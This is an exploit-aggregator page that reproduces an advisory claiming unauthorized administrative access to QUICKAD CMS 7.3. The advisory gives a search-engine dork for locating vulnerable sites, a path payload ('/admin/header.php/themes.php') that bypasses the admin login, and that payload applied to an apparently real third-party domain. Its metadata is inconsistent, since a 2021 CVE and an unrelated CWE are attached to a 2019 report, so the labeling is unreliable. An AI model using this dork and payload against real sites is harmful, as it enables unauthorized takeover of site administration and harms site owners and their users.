Advertisement






QUICKAD CMS 7.3 Unauthorized administrative access Vulnerability

CVE Category Price Severity
CVE-2021-41157 CWE-129: Improper Validation of Array Index $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-31
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050315

Below is a copy:

QUICKAD CMS 7.3 Unauthorized administrative access Vulnerability
====================================================================================================================================
| # Title     : QUICKAD CMS 7.3 Unauthorized administrative access Vulnerability                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189                                  |  
| # Dork      : "Bylancer, All right reserved"                                                                                     |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : /admin/header.php/themes.php

[+] klaniklan.com/admin/header.php/themes.php


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.